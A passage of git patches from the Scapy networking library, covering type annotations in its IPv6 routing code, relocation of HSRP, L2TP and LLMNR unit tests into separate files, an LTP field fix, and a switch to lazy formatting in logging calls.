noqa: E501 # parameters. We only have a 'dst' parameter that accepts 'prefix' and # 'prefix/prefixlen' values. - def make_route(self, dst, gw=None, dev=None): + def make_route(self, + dst, # type: str + gw=None, # type: Optional[str] + dev=None, # type: Optional[str] + ): + # type: (...) -> Tuple[str, int, str, str, List[str], int] """Internal function : create a route for 'dst' via 'gw'. """ - prefix, plen = (dst.split("/") + ["128"])[:2] - plen = int(plen) + prefix, plen_b = (dst.split("/") + ["128"])[:2] + plen = int(plen_b) if gw is None: gw = "::" if dev is None: - dev, ifaddr, x = self.route(gw) + dev, ifaddr_uniq, x = self.route(gw) + ifaddr = [ifaddr_uniq] else: lifaddr = in6_getifaddr() devaddrs = [x for x in lifaddr if x[2] == dev] @@ -91,6 +113,7 @@ def make_route(self, dst, gw=None, dev=None): return (prefix, plen, gw, dev, ifaddr, 1) def add(self, *args, **kargs): + # type: (*Any, **Any) -> None """Ex: add(dst="2001:db8:cafe:f000::/56") add(dst="2001:db8:cafe:f000::/56", gw="2001:db8:cafe::1") @@ -100,6 +123,7 @@ def add(self, *args, **kargs): self.routes.append(self.make_route(*args, **kargs)) def remove_ipv6_iface(self, iface): + # type: (str) -> None """ Remove the network interface 'iface' from the list of interfaces supporting IPv6. @@ -112,15 +136,16 @@ def remove_ipv6_iface(self, iface): pass def delt(self, dst, gw=None): + # type: (str, Optional[str]) -> None """ Ex: delt(dst="::/0") delt(dst="2001:db8:cafe:f000::/56") delt(dst="2001:db8:cafe:f000::/56", gw="2001:db8:deca::1") """ tmp = dst + "/128" - dst, plen = tmp.split('/')[:2] + dst, plen_b = tmp.split('/')[:2] dst = in6_ptop(dst) - plen = int(plen) + plen = int(plen_b) to_del = [x for x in self.routes if in6_ptop(x[0]) == dst and x[1] == plen] if gw: @@ -137,15 +162,16 @@ def delt(self, dst, gw=None): del(self.routes[i]) def ifchange(self, iff, addr): - the_addr, the_plen = (addr.split("/") + ["128"])[:2] - the_plen = int(the_plen) + # type: (str, str) -> None + the_addr, the_plen_b = (addr.split("/") + ["128"])[:2] + the_plen = int(the_plen_b) naddr = inet_pton(socket.AF_INET6, the_addr) nmask = in6_cidr2mask(the_plen) the_net = inet_ntop(socket.AF_INET6, in6_and(nmask, naddr)) for i, route in enumerate(self.routes): - net, plen, gw, iface, addr, metric = route + net, plen, gw, iface, _, metric = route if iface != iff: continue @@ -156,9 +182,10 @@ def ifchange(self, iff, addr): else: self.routes[i] = (net, plen, gw, iface, [the_addr], metric) self.invalidate_cache() - conf.netcache.in6_neighbor.flush() + conf.netcache.in6_neighbor.flush() # type: ignore def ifdel(self, iff): + # type: (str) -> None """ removes all route entries that uses 'iff' interface. """ new_routes = [] for rt in self.routes: @@ -169,6 +196,7 @@ def ifdel(self, iff): self.remove_ipv6_iface(iff) def ifadd(self, iff, addr): + # type: (str, str) -> None """ Add an interface 'iff' with provided address into routing table. @@ -181,9 +209,9 @@ def ifadd(self, iff, addr): prefix length value can be omitted. In that case, a value of 128 will be used. """ - addr, plen = (addr.split("/") + ["128"])[:2] + addr, plen_b = (addr.split("/") + ["128"])[:2] addr = in6_ptop(addr) - plen = int(plen) + plen = int(plen_b) naddr = inet_pton(socket.AF_INET6, addr) nmask = in6_cidr2mask(plen) prefix = inet_ntop(socket.AF_INET6, in6_and(nmask, naddr)) @@ -191,7 +219,8 @@ def ifadd(self, iff, addr): self.routes.append((prefix, plen, '::', iff, [addr], 1)) self.ipv6_ifaces.add(iff) - def route(self, dst=None, dev=None, verbose=conf.verb): + def route(self, dst="", dev=None, verbose=conf.verb): + # type: (str, Optional[Any], int) -> Tuple[str, str, str] """ Provide best route to IPv6 destination address, based on Scapy internal routing table content. @@ -259,7 +288,7 @@ def route(self, dst=None, dev=None, verbose=conf.verb): if k in self.cache: return self.cache[k] - paths = [] + paths = [] # type: List[Tuple[int, int, Tuple[str, List[str], str]]] # TODO : review all kinds of addresses (scope and *cast) to see # if we are able to cope with everything possible. I'm convinced @@ -288,12 +317,12 @@ def route(self, dst=None, dev=None, verbose=conf.verb): best_plen = (paths[0][0], paths[0][1]) paths = [x for x in paths if (x[0], x[1]) == best_plen] - res = [] - for p in paths: # Here we select best source address for every route - tmp = p[2] - srcaddr = get_source_addr_from_candidate_set(dst, tmp[1]) + res = [] # type: List[Tuple[int, int, Tuple[str, str, str]]] + for path in paths: # we select best source address for every route + tup = path[2] + srcaddr = get_source_addr_from_candidate_set(dst, tup[1]) if srcaddr is not None: - res.append((p[0], p[1], (tmp[0], srcaddr, tmp[2]))) + res.append((path[0], path[1], (tup[0], srcaddr, tup[2]))) if res == []: warning("Found a route for IPv6 destination '%s', but no possible source address.", dst) # noqa: E501 @@ -309,7 +338,7 @@ def route(self, dst=None, dev=None, verbose=conf.verb): # first one if len(res) > 1: - tmp = [] + tmp = [] # type: List[Tuple[int, int, Tuple[str, str, str]]] if in6_isgladdr(dst) and in6_isaddr6to4(dst): # TODO : see if taking the longest match between dst and # every source addresses would provide better results diff --git a/test/regression.uts b/test/regression.uts index a2a40290425..adf2a4f4753 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -9627,6 +9627,7 @@ ro = RandOID("1.2.3.0-28", depth=RandNumExpo(0.2), idnum=RandNumExpo(0.02)) assert(ro.command() == "RandOID(fmt='1.2.3.0-28', depth=RandNumExpo(lambd=0.2), idnum=RandNumExpo(lambd=0.02))") = RandRegExp +~ not_pyannotate random.seed(0x2807) rex = RandRegExp("[g-v]* @? [0-9]{3} . (g|v)") From f14ce903c5b501dfcd0e64644a1dfb3823a942f8 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 18 Oct 2020 20:34:41 +0200 Subject: [PATCH 0338/1632] Apply suggestions --- scapy/route.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/route.py b/scapy/route.py index 0bd2e51099a..3cdbf540de6 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -66,7 +66,7 @@ def make_route(self, host=None, # type: Optional[str] net=None, # type: Optional[str] gw=None, # type: Optional[str] - dev=None, # type: Optional[Any] + dev=None, # type: Optional[str] metric=1, # type: int ): # type: (...) -> Tuple[int, int, str, str, str, int] From 6918c9fb1cf6851896c0045463b88de7d4b08a17 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 18 Oct 2020 20:50:17 +0200 Subject: [PATCH 0339/1632] Apply suggestion --- scapy/route6.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/scapy/route6.py b/scapy/route6.py index f88277e98cc..93a3dc02e0d 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -319,10 +319,10 @@ def route(self, dst="", dev=None, verbose=conf.verb): res = [] # type: List[Tuple[int, int, Tuple[str, str, str]]] for path in paths: # we select best source address for every route - tup = path[2] - srcaddr = get_source_addr_from_candidate_set(dst, tup[1]) + tmp_c = path[2] + srcaddr = get_source_addr_from_candidate_set(dst, tmp_c[1]) if srcaddr is not None: - res.append((path[0], path[1], (tup[0], srcaddr, tup[2]))) + res.append((path[0], path[1], (tmp_c[0], srcaddr, tmp_c[2]))) if res == []: warning("Found a route for IPv6 destination '%s', but no possible source address.", dst) # noqa: E501 From e2a2a2a72cb08857804e94e32530df530ce472f9 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 21 Oct 2020 19:05:14 +0200 Subject: [PATCH 0340/1632] Standalone HSRP unit tests Co-authored-by: Gabriel Co-authored-by: Pierre LALET --- test/regression.uts | 12 ------------ test/scapy/layers/hsrp.uts | 15 +++++++++++++++ 2 files changed, 15 insertions(+), 12 deletions(-) create mode 100644 test/scapy/layers/hsrp.uts diff --git a/test/regression.uts b/test/regression.uts index adf2a4f4753..01d777579b5 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -9063,18 +9063,6 @@ pkt = IP(s) assert pkt[MobileIP][MobileIPRRP].haaddr == '95.83.86.216' -############ -############ -+ HSRP tests - -= HSRP - build & dissection -defaddr = conf.route.route('0.0.0.0')[1] -pkt = IP(raw(IP()/UDP(dport=1985, sport=1985)/HSRP()/HSRPmd5())) -assert pkt[IP].dst == "224.0.0.2" and pkt[UDP].sport == pkt[UDP].dport == 1985 -assert pkt[HSRP].opcode == 0 and pkt[HSRP].state == 16 -assert pkt[HSRPmd5].type == 4 and pkt[HSRPmd5].sourceip == defaddr - - ############ ############ + RIP tests diff --git a/test/scapy/layers/hsrp.uts b/test/scapy/layers/hsrp.uts new file mode 100644 index 00000000000..eeabeb0fea3 --- /dev/null +++ b/test/scapy/layers/hsrp.uts @@ -0,0 +1,15 @@ +% HSRP regression tests for Scapy + + +############ +############ ++ HSRP tests + += HSRP - build & dissection +defaddr = conf.route.route('0.0.0.0')[1] +pkt = IP(raw(IP()/UDP(dport=1985, sport=1985)/HSRP()/HSRPmd5())) +assert pkt[IP].dst == "224.0.0.2" and pkt[UDP].sport == pkt[UDP].dport == 1985 +assert pkt[HSRP].opcode == 0 and pkt[HSRP].state == 16 +assert pkt[HSRPmd5].type == 4 and pkt[HSRPmd5].sourceip == defaddr + + From d5906f5c2c7d5877ce26cf4b525ba43512c5e8f3 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 21 Oct 2020 19:11:35 +0200 Subject: [PATCH 0341/1632] Standalone L2TP unit tests Co-authored-by: Gabriel Co-authored-by: Speidy --- test/regression.uts | 12 ------------ test/scapy/layers/l2tp.uts | 13 +++++++++++++ 2 files changed, 13 insertions(+), 12 deletions(-) create mode 100644 test/scapy/layers/l2tp.uts diff --git a/test/regression.uts b/test/regression.uts index 01d777579b5..7361970fa03 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -9024,18 +9024,6 @@ p = Ether(src="00:00:5e:00:02:02",dst="33:33:00:00:00:12")/IPv6(src="2001:db8::1 c = Ether(raw(p)) assert c[VRRPv3].chksum == 0x481b -############ -############ -+ L2TP tests - -= L2TP - build -s = raw(IP()/UDP()/L2TP()) -s == b'E\x00\x00"\x00\x01\x00\x00@\x11|\xc8\x7f\x00\x00\x01\x7f\x00\x00\x01\x06\xa5\x06\xa5\x00\x0e\xf4\x83\x00\x02\x00\x00\x00\x00' - -= L2TP - dissection -p = IP(s) -L2TP in p and len(p[L2TP]) == 6 and p.tunnel_id == 0 and p.session_id == 0 and p[UDP].chksum == 0xf483 - ############ ############ diff --git a/test/scapy/layers/l2tp.uts b/test/scapy/layers/l2tp.uts new file mode 100644 index 00000000000..6cf3ae3be62 --- /dev/null +++ b/test/scapy/layers/l2tp.uts @@ -0,0 +1,13 @@ +% L2TP regression tests for Scapy + +############ +############ ++ L2TP tests + += L2TP - build +s = raw(IP()/UDP()/L2TP()) +s == b'E\x00\x00"\x00\x01\x00\x00@\x11|\xc8\x7f\x00\x00\x01\x7f\x00\x00\x01\x06\xa5\x06\xa5\x00\x0e\xf4\x83\x00\x02\x00\x00\x00\x00' + += L2TP - dissection +p = IP(s) +L2TP in p and len(p[L2TP]) == 6 and p.tunnel_id == 0 and p.session_id == 0 and p[UDP].chksum == 0xf483 From ff8b99a618daf6faaefa82705de7b6e38622923c Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 21 Oct 2020 19:13:54 +0200 Subject: [PATCH 0342/1632] Standalone LLMNR unit tests Co-authored-by: Gabriel --- test/regression.uts | 35 ---------------------------------- test/scapy/layers/llmnr.uts | 38 +++++++++++++++++++++++++++++++++++++ 2 files changed, 38 insertions(+), 35 deletions(-) create mode 100644 test/scapy/layers/llmnr.uts diff --git a/test/regression.uts b/test/regression.uts index 7361970fa03..5f4a372a2a0 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -6309,41 +6309,6 @@ conf.contribs["http"]["auto_compression"] = True c = sniff(offline=[xa, xb], session=TCPSession)[0] assert gzip_decompress(z) == c.load -############ -############ -+ LLMNR protocol - -= Simple packet dissection -pkt = Ether(b'\x11\x11\x11\x11\x11\x11\x99\x99\x99\x99\x99\x99\x08\x00E\x00\x00(\x00\x01\x00\x00@\x11:\xa4\xc0\xa8\x00w\x7f\x00\x00\x01\x14\xeb\x14\xeb\x00\x14\x95\xcf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -assert pkt.sport == 5355 -assert pkt.dport == 5355 -assert pkt[LLMNRQuery].opcode == 0 - -= Packet build / dissection -pkt = UDP(raw(UDP()/LLMNRResponse())) -assert LLMNRResponse in pkt -assert pkt.qr == 1 -assert pkt.c == 0 -assert pkt.tc == 0 -assert pkt.z == 0 -assert pkt.rcode == 0 -assert pkt.qdcount == 0 -assert pkt.arcount == 0 -assert pkt.nscount == 0 -assert pkt.ancount == 0 - -= Answers - building -a = UDP()/LLMNRResponse(id=12) -b = UDP()/LLMNRQuery(id=12) -assert a.answers(b) -assert not b.answers(a) -assert b.hashret() == b'\x00\x0c' - -= Answers - dissecting -a = Ether(b'\xd0P\x99V\xdd\xf9\x14\x0cv\x8f\xfe(\x08\x00E\x00\x00(\x00\x01\x00\x00@\x11:\xa4\x7f\x00\x00\x01\xc0\xa8\x00w\x14\xeb\x14\xeb\x00\x14\x95\xcf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -b = Ether(b'\x14\x0cv\x8f\xfe(\xd0P\x99V\xdd\xf9\x08\x00E\x00\x00(\x00\x01\x00\x00@\x11:\xa4\xc0\xa8\x00w\x7f\x00\x00\x01\x14\xeb\x14\xeb\x00\x14\x15\xcf\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00') -assert b.answers(a) -assert not a.answers(b) ############ ############ diff --git a/test/scapy/layers/llmnr.uts b/test/scapy/layers/llmnr.uts new file mode 100644 index 00000000000..fe95e259b8f --- /dev/null +++ b/test/scapy/layers/llmnr.uts @@ -0,0 +1,38 @@ +% LLMNR regression tests for Scapy + +############ +############ ++ LLMNR protocol + += Simple packet dissection +pkt = Ether(b'\x11\x11\x11\x11\x11\x11\x99\x99\x99\x99\x99\x99\x08\x00E\x00\x00(\x00\x01\x00\x00@\x11:\xa4\xc0\xa8\x00w\x7f\x00\x00\x01\x14\xeb\x14\xeb\x00\x14\x95\xcf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +assert pkt.sport == 5355 +assert pkt.dport == 5355 +assert pkt[LLMNRQuery].opcode == 0 + += Packet build / dissection +pkt = UDP(raw(UDP()/LLMNRResponse())) +assert LLMNRResponse in pkt +assert pkt.qr == 1 +assert pkt.c == 0 +assert pkt.tc == 0 +assert pkt.z == 0 +assert pkt.rcode == 0 +assert pkt.qdcount == 0 +assert pkt.arcount == 0 +assert pkt.nscount == 0 +assert pkt.ancount == 0 + += Answers - building +a = UDP()/LLMNRResponse(id=12) +b = UDP()/LLMNRQuery(id=12) +assert a.answers(b) +assert not b.answers(a) +assert b.hashret() == b'\x00\x0c' + += Answers - dissecting +a = Ether(b'\xd0P\x99V\xdd\xf9\x14\x0cv\x8f\xfe(\x08\x00E\x00\x00(\x00\x01\x00\x00@\x11:\xa4\x7f\x00\x00\x01\xc0\xa8\x00w\x14\xeb\x14\xeb\x00\x14\x95\xcf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +b = Ether(b'\x14\x0cv\x8f\xfe(\xd0P\x99V\xdd\xf9\x08\x00E\x00\x00(\x00\x01\x00\x00@\x11:\xa4\xc0\xa8\x00w\x7f\x00\x00\x01\x14\xeb\x14\xeb\x00\x14\x15\xcf\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00') +assert b.answers(a) +assert not a.answers(b) + From f991141c7b72fa194a94da48bcdbe3fbce908cd7 Mon Sep 17 00:00:00 2001 From: stock1218 Date: Wed, 21 Oct 2020 15:52:10 -0400 Subject: [PATCH 0343/1632] Remove duplicated fields from LTP (#2871) --- scapy/contrib/ltp.py | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/scapy/contrib/ltp.py b/scapy/contrib/ltp.py index 875e62c0a6e..167a8cecd6c 100755 --- a/scapy/contrib/ltp.py +++ b/scapy/contrib/ltp.py @@ -140,8 +140,12 @@ class LTP(Packet): # ConditionalField(SDNV2("CheckpointSerialNo", 0), lambda x: x.flags in _ltp_checkpoint_segment), + # + # For segments that are checkpoints or reception reports. + # ConditionalField(SDNV2("ReportSerialNo", 0), - lambda x: x.flags in _ltp_checkpoint_segment), + lambda x: x.flags in _ltp_checkpoint_segment \ + or x.flags == 8), # # Then comes the actual payload for data carrying segments. # @@ -154,10 +158,9 @@ class LTP(Packet): ConditionalField(SDNV2("RA_ReportSerialNo", 0), lambda x: x.flags == 9), # - # Reception reports have the following fields. + # Reception reports have the following fields, + # excluding ReportSerialNo defined above. # - ConditionalField(SDNV2("ReportSerialNo", 0), - lambda x: x.flags == 8), ConditionalField(SDNV2("ReportCheckpointSerialNo", 0), lambda x: x.flags == 8), ConditionalField(SDNV2("ReportUpperBound", 0), From 720200b623b3b2700e8622a8a90fb4d5fc7c7ba1 Mon Sep 17 00:00:00 2001 From: Andreas Korb Date: Mon, 19 Oct 2020 16:35:08 +0200 Subject: [PATCH 0344/1632] Use lazy formatting in logging functions --- scapy/arch/linux.py | 2 +- scapy/contrib/automotive/enumerator.py | 18 +++++++++--------- scapy/contrib/automotive/gm/gmlanutils.py | 13 +++++++------ scapy/contrib/eigrp.py | 2 +- scapy/contrib/geneve.py | 2 +- scapy/contrib/ikev2.py | 2 +- scapy/contrib/isotp.py | 2 +- scapy/contrib/tzsp.py | 15 +++++++++------ scapy/fields.py | 4 ++-- scapy/layers/all.py | 2 +- scapy/layers/dns.py | 13 +++++-------- scapy/layers/inet.py | 4 ++-- scapy/layers/l2.py | 2 +- scapy/layers/tls/automaton_cli.py | 2 +- scapy/layers/tls/automaton_srv.py | 2 +- scapy/layers/tls/handshake.py | 8 ++++---- scapy/layers/tls/handshake_sslv2.py | 4 ++-- scapy/layers/tls/session.py | 3 ++- scapy/layers/usb.py | 2 +- scapy/layers/vrrp.py | 3 ++- scapy/main.py | 14 +++++++------- scapy/modules/p0f.py | 2 +- scapy/packet.py | 6 ++++-- scapy/pipetool.py | 6 ++++-- scapy/sendrecv.py | 2 +- 25 files changed, 71 insertions(+), 64 deletions(-) diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 0b12c209279..b084dd9ba90 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -442,7 +442,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, try: attach_filter(self.ins, filter, iface) except ImportError as ex: - log_runtime.error("Cannot set filter: %s" % ex) + log_runtime.error("Cannot set filter: %s", ex) if self.promisc: set_promisc(self.ins, self.iface) self.ins.bind((self.iface, type)) diff --git a/scapy/contrib/automotive/enumerator.py b/scapy/contrib/automotive/enumerator.py index 5ae510193d6..226c17c259e 100644 --- a/scapy/contrib/automotive/enumerator.py +++ b/scapy/contrib/automotive/enumerator.py @@ -117,13 +117,13 @@ def scan(self, state, requests, timeout=1, **kwargs): else: it = self.request_iterators[state] - log_interactive.debug("Using iterator %s in state %s" % (it, state)) + log_interactive.debug("Using iterator %s in state %s", it, state) for req in it: try: res = self.sock.sr1(req, timeout=timeout, verbose=False) except ValueError as e: - warning("Exception in scan %s" % e) + warning("Exception in scan %s", e) break self.results.append(Enumerator.ScanResult(state, req, res)) @@ -356,20 +356,20 @@ def scan(self): scan_complete = False while not scan_complete: scan_complete = True - log_interactive.info("[i] Scan paths %s" % self.get_state_paths()) + log_interactive.info("[i] Scan paths %s", self.get_state_paths()) for p in self.get_state_paths(): - log_interactive.info("[i] Scan path %s" % p) + log_interactive.info("[i] Scan path %s", p) final_state = p[-1] for e in self.enumerators: if e.state_completed[final_state]: - log_interactive.debug("[+] State %s for %s completed" % - (repr(final_state), e)) + log_interactive.debug("[+] State %s for %s completed", + repr(final_state), e) continue if not self.enter_state_path(p): - log_interactive.error("[-] Error entering path %s" % p) + log_interactive.error("[-] Error entering path %s", p) continue - log_interactive.info("[i] EXECUTE SCAN %s for path %s" % - (e.__class__.__name__, p)) + log_interactive.info("[i] EXECUTE SCAN %s for path %s", + e.__class__.__name__, p) self.execute_enumerator(e) scan_complete = False self.reset_target() diff --git a/scapy/contrib/automotive/gm/gmlanutils.py b/scapy/contrib/automotive/gm/gmlanutils.py index 66ae9919bc6..af6b40f2470 100644 --- a/scapy/contrib/automotive/gm/gmlanutils.py +++ b/scapy/contrib/automotive/gm/gmlanutils.py @@ -236,8 +236,8 @@ def GMLAN_TransferData(sock, addr, payload, maxmsglen=None, timeout=None, scheme = conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] if addr < 0 or addr >= 2**(8 * scheme): - warning("Error: Invalid address " + hex(addr) + " for scheme " + - str(scheme)) + warning("Error: Invalid address %s for scheme %s", + hex(addr), str(scheme)) return False # max size of dataRecord according to gmlan protocol @@ -311,14 +311,15 @@ def GMLAN_ReadMemoryByAddress(sock, addr, length, timeout=None, scheme = conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] if addr < 0 or addr >= 2**(8 * scheme): - warning("Error: Invalid address " + hex(addr) + " for scheme " + - str(scheme)) + warning("Error: Invalid address %s for scheme %s", + hex(addr), str(scheme)) return None # max size of dataRecord according to gmlan protocol if length <= 0 or length > (4094 - scheme): - warning("Error: Invalid length " + hex(length) + " for scheme " + - str(scheme) + ". Choose between 0x1 and " + hex(4094 - scheme)) + warning("Error: Invalid length %s for scheme %s. " + "Choose between 0x1 and %s", + hex(length), str(scheme), hex(4094 - scheme)) return None while retry >= 0: diff --git a/scapy/contrib/eigrp.py b/scapy/contrib/eigrp.py index 8dc03ab93f8..775c130e20d 100644 --- a/scapy/contrib/eigrp.py +++ b/scapy/contrib/eigrp.py @@ -296,7 +296,7 @@ def h2i(self, pkt, x): if not hasattr(self, "default"): return x if self.default is not None: - warning("set value to default. Format of %r is invalid" % x) + warning("set value to default. Format of %r is invalid", x) return self.default else: raise Scapy_Exception("Format of value is invalid") diff --git a/scapy/contrib/geneve.py b/scapy/contrib/geneve.py index 7ef52d231b4..b387328777a 100644 --- a/scapy/contrib/geneve.py +++ b/scapy/contrib/geneve.py @@ -39,7 +39,7 @@ class GENEVEOptionsField(XStrField): def getfield(self, pkt, s): opln = pkt.optionlen * 4 if opln < 0: - warning("bad optionlen (%i). Assuming optionlen=0" % pkt.optionlen) + warning("bad optionlen (%i). Assuming optionlen=0", pkt.optionlen) opln = 0 return s[opln:], self.m2i(pkt, s[:opln]) diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index 668660a4aed..60cad4822e9 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -394,7 +394,7 @@ class IKEv2_class(Packet): def guess_payload_class(self, payload): np = self.next_payload - logging.debug("For IKEv2_class np=%d" % np) + logging.debug("For IKEv2_class np=%d", np) if np == 0: return conf.raw_layer elif np < len(IKEv2_payload_type): diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index d3ac3b36644..45a6210fb73 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -1173,7 +1173,7 @@ def on_can_recv(self, p): if p.identifier != self.dst_id: if not self.filter_warning_emitted and conf.verb >= 2: warning("You should put a filter for identifier=%x on your " - "CAN socket" % self.dst_id) + "CAN socket", self.dst_id) self.filter_warning_emitted = True else: self.on_recv(p) diff --git a/scapy/contrib/tzsp.py b/scapy/contrib/tzsp.py index 31d2eb29ece..5964362bda3 100644 --- a/scapy/contrib/tzsp.py +++ b/scapy/contrib/tzsp.py @@ -111,7 +111,8 @@ def get_encapsulated_payload_class(self): def guess_payload_class(self, payload): if self.type == TZSP.TYPE_KEEPALIVE: if len(payload): - warning('payload (%i bytes) in KEEPALIVE/NULL packet' % len(payload)) # noqa: E501 + warning('payload (%i bytes) in KEEPALIVE/NULL packet', + len(payload)) return Raw else: return _tzsp_guess_next_tag(payload) @@ -133,17 +134,19 @@ def _tzsp_handle_unknown_tag(payload, tag_type): payload_len = len(payload) if payload_len < 2: - warning('invalid or unknown tag type (%i) and too short packet - treat remaining data as Raw' % tag_type) # noqa: E501 + warning('invalid or unknown tag type (%i) and too short packet - ' + 'treat remaining data as Raw', tag_type) return Raw tag_data_length = orb(payload[1]) tag_data_fits_in_payload = (tag_data_length + 2) <= payload_len if not tag_data_fits_in_payload: - warning('invalid or unknown tag type (%i) and too short packet - treat remaining data as Raw' % tag_type) # noqa: E501 + warning('invalid or unknown tag type (%i) and too short packet - ' + 'treat remaining data as Raw', tag_type) return Raw - warning('invalid or unknown tag type (%i)' % tag_type) + warning('invalid or unknown tag type (%i)', tag_type) return TZSPTagUnknown @@ -175,13 +178,13 @@ def _tzsp_guess_next_tag(payload): length = None if not length: - warning('no tag length given - packet to short') + warning('no tag length given - packet too short') return Raw try: return tag_class_definition[length] except KeyError: - warning('invalid tag length {} for tag type {}'.format(length, tag_type)) # noqa: E501 + warning('invalid tag length %s for tag type %s', length, tag_type) return Raw diff --git a/scapy/fields.py b/scapy/fields.py index aa45ba38bfc..6ac03ae9d45 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2303,7 +2303,7 @@ def notify_set(self, enum, key, value): # type: (ObservableDict, I, str) -> None ks = "0x%x" if isinstance(key, int) else "%s" log_runtime.debug( - ("At %s: Change to %s at " + ks) % (self, value, key) + "At %s: Change to %s at " + ks, self, value, key ) if self.i2s and self.s2i: self.i2s[key] = value @@ -2312,7 +2312,7 @@ def notify_set(self, enum, key, value): def notify_del(self, enum, key): # type: (ObservableDict, I) -> None ks = "0x%x" if isinstance(key, int) else "%s" - log_runtime.debug(("At %s: Delete value at " + ks) % (self, key)) + log_runtime.debug("At %s: Delete value at " + ks, self, key) if self.i2s and self.s2i: value = self.i2s[key] del self.i2s[key] diff --git a/scapy/layers/all.py b/scapy/layers/all.py index f3679c2bb4a..25e7b1e35f0 100644 --- a/scapy/layers/all.py +++ b/scapy/layers/all.py @@ -20,7 +20,7 @@ __all__ = [] for _l in conf.load_layers: - log_loading.debug("Loading layer %s" % _l) + log_loading.debug("Loading layer %s", _l) try: load_layer(_l, globals_dict=globals(), symb_list=__all__) except Exception as e: diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 20cce3cdf61..bbe717c21dd 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -57,10 +57,7 @@ def dns_get_str(s, pointer=0, pkt=None, _fullpacket=False): while True: if abs(pointer) >= max_length: log_runtime.info( - "DNS RR prematured end (ofs=%i, len=%i)" % ( - pointer, - len(s) - ) + "DNS RR prematured end (ofs=%i, len=%i)", pointer, len(s) ) break cur = orb(s[pointer]) # get pointer value @@ -72,7 +69,7 @@ def dns_get_str(s, pointer=0, pkt=None, _fullpacket=False): after_pointer = pointer + 1 if pointer >= max_length: log_runtime.info( - "DNS incomplete jump token at (ofs=%i)" % pointer + "DNS incomplete jump token at (ofs=%i)", pointer ) break # Follow the pointer @@ -364,7 +361,7 @@ def m2i(self, pkt, s): if tmp_len > len(tmp_s): log_runtime.info( "DNS RR TXT prematured end of character-string " - "(size=%i, remaining bytes=%i)" % (tmp_len, len(tmp_s)) + "(size=%i, remaining bytes=%i)", tmp_len, len(tmp_s) ) ret_s.append(tmp_s[1:tmp_len]) tmp_s = tmp_s[tmp_len:] @@ -557,7 +554,7 @@ def bitmap2RRlist(bitmap): while bitmap: if len(bitmap) < 2: - log_runtime.info("bitmap too short (%i)" % len(bitmap)) + log_runtime.info("bitmap too short (%i)", len(bitmap)) return window_block = orb(bitmap[0]) # window number @@ -565,7 +562,7 @@ def bitmap2RRlist(bitmap): bitmap_len = orb(bitmap[1]) # length of the bitmap in bytes if bitmap_len <= 0 or bitmap_len > 32: - log_runtime.info("bitmap length is no valid (%i)" % bitmap_len) + log_runtime.info("bitmap length is no valid (%i)", bitmap_len) return tmp_bitmap = bitmap[2:2 + bitmap_len] diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index b919f6bb51f..9c8fdec060e 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -367,7 +367,7 @@ def getfield(self, pkt, s): opsz = (pkt.dataofs - 5) * 4 if opsz < 0: log_runtime.info( - "bad dataofs (%i). Assuming dataofs=5" % pkt.dataofs + "bad dataofs (%i). Assuming dataofs=5", pkt.dataofs ) opsz = 0 return s[opsz:], self.m2i(pkt, s[:opsz]) @@ -389,7 +389,7 @@ def m2i(self, pkt, x): olen = 0 if olen < 2: log_runtime.info( - "Malformed TCP option (announced length is %i)" % olen + "Malformed TCP option (announced length is %i)", olen ) olen = 2 oval = x[2:olen] diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 3b00f8403b1..aa377c6675c 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -116,7 +116,7 @@ def getmacbyip(ip, chainCC=0): chainCC=chainCC, nofilter=1) except Exception as ex: - warning("getmacbyip failed on %s" % ex) + warning("getmacbyip failed on %s", ex) return None if res is not None: mac = res.payload.hwsrc diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 1523b080f7d..dc3d70aa69b 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -256,7 +256,7 @@ def INIT_TLS_SESSION(self): if self.resumption_master_secret: if s.tls13_ticket_ciphersuite not in _tls_cipher_suites_cls: # noqa: E501 - warning("Unknown cipher suite %d" % s.tls13_ticket_ciphersuite) # noqa: E501 + warning("Unknown cipher suite %d", s.tls13_ticket_ciphersuite) # noqa: E501 # we do not try to set a default nor stop the execution else: cs_cls = _tls_cipher_suites_cls[s.tls13_ticket_ciphersuite] # noqa: E501 diff --git a/scapy/layers/tls/automaton_srv.py 